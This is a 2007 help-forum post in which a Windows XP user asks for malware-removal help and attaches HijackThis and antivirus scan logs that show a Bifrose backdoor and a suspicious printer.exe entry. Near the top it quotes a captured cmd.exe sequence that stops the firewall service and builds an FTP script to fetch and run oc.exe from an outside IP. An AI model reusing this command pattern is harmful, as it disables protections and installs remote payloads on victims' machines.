Hi

I have followed your instructions for removal of Malware and Spyware on my pc. However, the panda soft scan revealed a number of spyware/malware items which were not removed. These had not been picked up by Norton. Spybot D&D, Ad-Aware, AVG, SuperAV or ATF Cleaner.

This process was started as I received a prompt from Windows Security to run a file called printer.exe 0E099EB1.pf Norton also picked this up and recommended I install. However as the publisher was unsigned, I decided to check on the web first what the file is. I read lots about it being associated with Malware and spyware.

In addition, I have suffered attacks over the last few months with someone running a script remotely on my pc which opens cmd.exe and enters code in dos. (E.G.

> ^C
> C:\Documents and Settings\Richard Moxham>
> C:\Documents and Settings\Richard Moxham>*t%\system32\cd. stop
> SharedAccess &echo
> open 85.250.33.92 62113 >> ij &echo user t g >> ij &echo get oc.exe

> >> ij &echo
> bye >> ij &ftp -n -v ij&oc.et start SharedAccess &exit
> The system cannot find the path specified.
> Unknown host ij.
> ftp>
> ftp>*
> ftp>

When I have searched for these files, they do not appear on my pc. Or the cmd window says file not known/found.

I have a service on my pc called VNC which allows remote control of my pc by IT staff at the company I work for when I have database related IT issues (I work remotely). They confirm none of these entries were by them.

I believe that the Printer.exe file was downloaded by such a cmd prompt instruction.

Meanwhile, my PC has been running slowly and I was until I removed it from the start list, prompted to install the file.

I attach the various logs you requested:

HIJACK THIS LOG

Logfile of HijackThis v1.99.1
Scan saved at 09:50:16, on 07/10/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Multimedia Keyboard Driver\PS2USBKbdDrv.exe
C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Picasa2\PicasaMediaDetector.exe
C:\Program Files\Nokia\Nokia PC Suite 6\LaunchApplication.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Lavasoft\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Lavasoft\SUPERAntiSpyware.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\NETGEAR\NETGEAR MA521 Adapter\wlancfg5.exe
C:\Program Files\NETGEAR\WG111v2 Configuration Utility\RtlWake.exe
C:\PROGRA~1\COMMON~1\PCSuite\DATALA~1\DATALA~1.EXE
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\OpenOffice.org 2.2\program\soffice.exe
C:\Program Files\OpenOffice.org 2.2\program\soffice.BIN
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\msiexec.exe
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system32\dllhost.exe
C:\PROGRA~1\MICROS~2\Office\OUTLOOK.EXE
C:\WINDOWS\system32\msdtc.exe
C:\WINDOWS\msagent\AgentSvr.exe
C:\Program Files\Lavasoft\Hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.uk/
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\Lavasoft\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [osCheck] "C:\Program Files\Norton AntiVirus\osCheck.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [WireLessKeyboard] C:\Program Files\Multimedia Keyboard Driver\StartAutorun.exe PS2USBKbdDrv.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [PCSuiteTrayApplication] C:\Program Files\Nokia\Nokia PC Suite 6\LaunchApplication.exe -startup
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\RunServices: [Hp_Service] printer.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Lavasoft\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\Lavasoft\SUPERAntiSpyware.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Netvision Cable Connect.url
O4 - Startup: OpenOffice.org 2.2.lnk = C:\Program Files\OpenOffice.org 2.2\program\quickstart.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: MA521 Configuration Utility.lnk = C:\Program Files\NETGEAR\NETGEAR MA521 Adapter\wlancfg5.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Global Startup: WG111v2 Smart Wizard Wireless Setting.lnk = ?
O8 - Extra context menu item: Translate with &Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Translate.htm
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Lavasoft\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Lavasoft\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {4E62C4DE-627D-4604-B157-4B7D6B09F02E} (AccountTracking Profile Manager Class) - https://moneymanager.egg.com/Pinsafe/accounttracking.cab
O16 - DPF: {6A344D34-5231-452A-8A57-D064AC9B7862} (Symantec Download Manager) - https://webdl.symantec.com/activex/symdlmgr.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdat...b?1180266682263
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - https://fpdownload.macromedia.com/get/shock...ash/swflash.cab
O16 - DPF: {E10869DE-C0E2-40E1-B247-EE6EB3921F68} (NetisClient Class) - http://archive.globes.co.il/ENGLISH/NetisU...netisclient.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{91E6A3EF-84C3-4C95-AA50-1C7D67E76F1F}: NameServer = 212.143.212.143 194.90.1.5
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\Lavasoft\SASWINLO.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft AB - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Lavasoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Settings Manager (ccSetMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Symantec IS Password Validation (ISPwdSvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\isPwdSvc.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: Symantec Core LC - Unknown owner - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)



SUPERANTIVIRUS LOG

SUPERAntiSpyware Scan Log
Generated 10/06/2007 at 04:09 AM

Application Version : 3.6.1000

Core Rules Database Version : 3319
Trace Rules Database Version: 1320

Scan type : Complete Scan
Total Scan Time : 03:14:55

Memory items scanned : 632
Memory threats detected : 0
Registry items scanned : 5592
Registry threats detected : 0
File items scanned : 84471
File threats detected : 70

Adware.Tracking Cookie
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@bs.serving-sys[1].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@atdmt[2].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@tacoda[1].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@serving-sys[1].txt
C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@overture[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ad.accelerator-media[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ad.bannerconnect[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ad.msn.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@adinterax[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@adopt.specificclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.addynamix[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.ak.facebook[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.doctors.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.ft[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.keshet-i[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.pointroll[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.telegraph.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ads.xtra.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@adultadworld[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@archant.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@azjmp[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@burstnet[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@casalemedia[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@cnn.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@counter.credo[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@counter2[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@counter3.sextracker[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@dealtime.co[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@deloitte.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@dmedia.securest[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-acdsystems.hitbox[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-ati.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-independent.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-j2.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-logantod.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@ehg-systran.hitbox[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@fastclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@gostats[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@mckinseyknowledge.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@metacafe.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@microsoftwga.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@msnisrael.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@mysextour[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@onlyteenblowjobs[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@paycounter[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@perf.overture[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@pro.imedia.co[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@propertyfinderltd.122.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@rocku.adbureau[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@roiservice[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@semdirector.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@server.iad.liveperson[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@sonyeurope.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@specificclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@stats.endsleigh.co[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@teenagewhores[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@track.omguk[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@tsahi.sitetracker[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@waterfrontmedia.112.2o7[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@windowsmedia[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.amateurporn4free[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.burstnet[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.clickmanage[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.mysextour[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.travelbyclick[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.windowsmedia[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.xxxmofo[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@xiti[2].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@xxxmofo[1].txt
E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@zedo[1].txt


Panda Soft Active Scan Log


Incident Status Location

Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Richard Moxham\Cookies\richard_moxham@overture[1].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Richard Moxham\Desktop\SmitfraudFix\Process.exe
Virus:Trj/Rebooter.J Disinfected C:\Documents and Settings\Richard Moxham\Desktop\SmitfraudFix\Reboot.exe
Potentially unwanted tool:Application/SuperFast Not disinfected C:\Documents and Settings\Richard Moxham\Desktop\SmitfraudFix\restart.exe
Virus:Bck/Bifrose.AYB Disinfected C:\WINDOWS\addons\Wuauclt.exe
Spyware:Cookie/NewMedia Not disinfected E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@anm.co[1].txt
Spyware:Cookie/GangbangSquad Not disinfected E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@gangbangsquad[2].txt
Spyware:Cookie/GangbangSquad Not disinfected E:\Documents and Settings\Richard Michal and G\Cookies\richard michal and g@www.gangbangsquad[1].txt
Potentially unwanted tool:Application/Processor Not disinfected E:\Documents and Settings\Richard Michal and G\Desktop\SmitfraudFix\Process.exe
Virus:Trj/Rebooter.J Disinfected E:\Documents and Settings\Richard Michal and G\Desktop\SmitfraudFix\Reboot.exe
Potentially unwanted tool:Application/SuperFast Not disinfected E:\Documents and Settings\Richard Michal and G\Desktop\SmitfraudFix\restart.exe
Virus:Trj/SpamtaLoad.DW Disinfected Personal Folders\Deleted Items\Mail server report.\Update-KB656-x86.zip[Update-KB656-x86.exe]
Virus:Trj/SpamtaLoad.DW Disinfected Personal Folders\Deleted Items\Mail server report.\Update-KB5531-x86.zip[Update-KB5531-x86.exe]


Looking at a lot of the cookies, this was prior usage on old win2000 profile which was used by the whole family (E: Drive). SHould I perhaps format this as it is no longer used/working following an error with the system32 file.